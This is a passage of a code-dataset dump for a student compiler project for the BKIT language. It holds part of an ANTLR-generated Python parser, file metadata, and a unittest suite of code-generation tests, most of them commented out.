self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_init\" ):\n listener.enterVar_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_init\" ):\n listener.exitVar_init(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,36,self._ctx)\n if la_ == 1:\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 392 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 389\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 390\n self.match(BKITParser.INT_LIT)\n self.state = 391\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 394 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 396\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 399\n self.match(BKITParser.ASSIGN)\n self.state = 402\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 400\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, 
BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 401\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_non_init\" ):\n listener.enterVar_non_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_non_init\" ):\n listener.exitVar_non_init(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 66, self.RULE_var_non_init)\n self._la = 0 # Token type\n try:\n self.state = 413\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,39,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 404\n self.match(BKITParser.ID)\n self.state = 408 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 405\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 406\n 
self.match(BKITParser.INT_LIT)\n self.state = 407\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 410 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 412\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterComposite_var\" ):\n listener.enterComposite_var(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitComposite_var\" ):\n listener.exitComposite_var(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 415\n self.match(BKITParser.ID)\n self.state = 420 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n 
while True:\n self.state = 416\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 417\n self.expr()\n self.state = 418\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 422 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterComposite_init\" ):\n listener.enterComposite_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitComposite_init\" ):\n listener.exitComposite_init(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 424\n self.composite_var()\n self.state = 425\n self.match(BKITParser.ASSIGN)\n self.state = 426\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n 
self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterPrimitive_init\" ):\n listener.enterPrimitive_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitPrimitive_init\" ):\n listener.exitPrimitive_init(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 428\n self.match(BKITParser.ID)\n self.state = 429\n self.match(BKITParser.ASSIGN)\n self.state = 430\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterParams_list\" ):\n listener.enterParams_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitParams_list\" ):\n 
listener.exitParams_list(self)\n\n\n\n\n def params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 432\n self.var_non_init()\n self.state = 437\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 433\n self.match(BKITParser.COMMA)\n self.state = 434\n self.var_non_init()\n self.state = 439\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[16] = self.expr1_sempred\n self._predicates[17] = self.expr2_sempred\n self._predicates[18] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3833611011505127, "alphanum_fraction": 0.407491534948349, "avg_line_length": 23.730337142944336, "blob_id": "8a4e61b40ecc3d79c7addba34f7f47689e47dde9", "content_id": "76e49c42fd75bcef27f5aed43a046fb77fbba486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19809, "license_type": "no_license", "max_line_length": 
76, "num_lines": 801, "path": "/Assignments/assignment4/src/test/CodeGenSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestCodeGen\nfrom AST import *\n\n\nclass CheckCodeGenSuite(unittest.TestCase):\n # def test_int(self):\n # \"\"\"Simple program: int main() {} \"\"\"\n # input = \"\"\"Function: main\n # Body: \n # print(string_of_int(120));\n # EndBody.\"\"\"\n # expect = \"120\"\n # self.assertTrue(TestCodeGen.test(input,expect,500))\n # def test_int_ast(self):\n # \tinput = Program([\n # \t\tFuncDecl(Id(\"main\"),[],([],[\n # \t\t\tCallStmt(Id(\"print\"),[\n # CallExpr(Id(\"string_of_int\"),[IntLiteral(120)])])]))])\n # \texpect = \"120\"\n # \tself.assertTrue(TestCodeGen.test(input,expect,501))\n\n # def test_decl(self):\n # input = \"\"\"\n # Var: x = 1;\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 502))\n \n # def test_main(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 503))\n \n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 504))\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body: \n # Var: x = 1, y = 3;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 505))\n\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body: \n # Var: x = 1, y = 3;\n # y = x;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # 
self.assertTrue(TestCodeGen.test(input, expect, 506))\n\n # def test_ret(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z\n # Body: \n # Var: x = 1;\n # y = x;\n # z = 1.2;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 507))\n \n # def test_arr(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {1,2};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 508))\n\n # def test_arr(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{1},{2}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 509))\n \n # def test_arr_flit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{1.2},{2.3}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 510))\n\n # def test_str_flit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{\"ab\"},{\"cd\"}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 511))\n \n # def test_arr_blit(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1]\n # Body: \n # Var: x = 1;\n # y = x;\n # z = {{\"ab\"},{\"cd\"}};\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 511))\n\n # 
def test_infer(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Parameter: y, z[2][1][3]\n # Body: \n # Var: x = 1;\n # y = x;\n # z[1][1][1] = 1;\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 512))\n\n # def test_if_without_infer(self):\n # \"\"\"Do not have else\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 513))\n\n # def test_if_with_else(self):\n # \"\"\"Do have else\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 514))\n\n # def test_if_with_return(self):\n # \"\"\"Do have return\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 515))\n\n # def test_if_with_inif(self):\n # \"\"\"Do have elseif\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y Then x = 2;\n # ElseIf !y Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 516))\n\n # def test_if_with_complex_expr(self):\n # \"\"\"Do have complex expr\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 
1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # If y && False Then x = 2;\n # ElseIf 1 < 2 Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 517))\n \n # def test_if_with_complex_expr(self):\n # \"\"\"Do have complex expr and infer\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # If y && z Then x = 2;\n # ElseIf 1 < 2 Then x =10;\n # Return 1;\n # Else x = 3;\n # EndIf.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 518))\n\n # def test_simple_while(self):\n # \"\"\"Do have simple while\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # While y Do y = False;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 518))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while with infer type\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do y = False;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 519))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have decl\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Break;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 519))\n\n 
# def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Break;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 520))\n\n # def test_simple_while_with_infer(self):\n # \"\"\"Do have simple while which have continue\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # While z Do \n # Var: x = 1.2;\n # y = False;\n # Continue;\n # EndWhile.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 521))\n\n # def test_simple_for(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # For (x = 0, y, 1) Do\n # x = 2;\n # EndFor.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 521))\n\n # def test_simple_dowhile(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # Do x = 2 While y EndDo.\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 522))\n\n # def test_simple_dowhile(self):\n # \"\"\"Do have simple while which have break\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(\"abs\");\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # z = 1;\n # Return ;\n # 
EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 523))\n\n # def test_callee(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(\"abs\");\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body:\n # Var: y = True, x = 1;\n # printStrLn(\"abs\");\n # Return ;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 524))\n\n\n # def test_callee_expr(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2];\n # x = foo();\n # Return;\n # EndBody.\n # Function: foo\n # Body:\n # Var: y = True, x = 1;\n # printStrLn(\"abs\");\n # Return 1;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 525))\n\n # def test_arr_1(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2] = {{1,2}};\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 526))\n\n # def test_arr_2(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1, y[1][2] = {{1,2}};\n # printStrLn(string_of_int(y[0][1]));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 527))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x = 1;\n # foo(x);\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z\n # Body: \n # Var: x = 1;\n # z = 999;\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 528))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer 
in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 529))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # x= 10;\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 530))\n\n # def test_callee_ret(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # foo(x);\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: z[3]\n # Body: \n # Var: x = 1;\n # z[1] = 999;\n # x= 10 + fooo(1);\n # printStrLn(string_of_int(x));\n # Return;\n # EndBody.\n # Function: fooo\n # Parameter: z\n # Body: \n # Return z;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 531))\n # def test_if(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # If x[0] < 2 Then x[1] = 5;\n # ElseIf x[1] > 4 Then x[1] =10;\n # Return;\n # Else x[1] = 3;\n # EndIf.\n # printStrLn(string_of_int(x[1]));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 532))\n\n # def test_callee(self):\n # \"\"\"Do param do not infer in function after\"\"\"\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # x[1] = foo(x[2], 
foo(1,2));\n # Return;\n # EndBody.\n # Function: foo\n # Parameter: x, y\n # Body:\n # Return x + y;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 533))\n\n # def test_if_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: x[3] = {1,2,3};\n # If x[1] > 1 Then\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # EndIf.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 534))\n\n # def test_while_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, x = 10;\n # While y[1] < 10 Do\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # y[1] = y[1] + 1;\n # EndWhile.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 535))\n\n # def test_dowhile_var(self):\n # input = \"\"\"\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, x = 10;\n # Do\n # Var: x = 1;\n # printStrLn(string_of_int(x));\n # y[1] = y[1] + 1;\n # While y[1] < 10\n # EndDo.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 536))\n\n # def test_dowhile_var(self):\n # input = \"\"\"\n # Var: l = 999;\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, z = 10, x = 1;\n # For (x = 1, x < 10, 1) Do\n # Var: z = 1;\n # printStrLn(string_of_int(x));\n # EndFor.\n # printStrLn(string_of_int(l));\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 537))\n\n def test_static(self):\n input = \"\"\"\n Function: main\n Body:\n Var: x = 1;\n printStrLn(string_of_int(foo(1, foo(x, 1))));\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return x + y;\n EndBody.\n \"\"\"\n expect = \"2\"\n self.assertTrue(TestCodeGen.test(input, expect, 538))\n\n\n # def test_static(self):\n # input = \"\"\"\n # Var: k = 999;\n # Function: main\n # Body: \n # Var: y[3] = {1,2,3}, z = 10, x = 1;\n # 
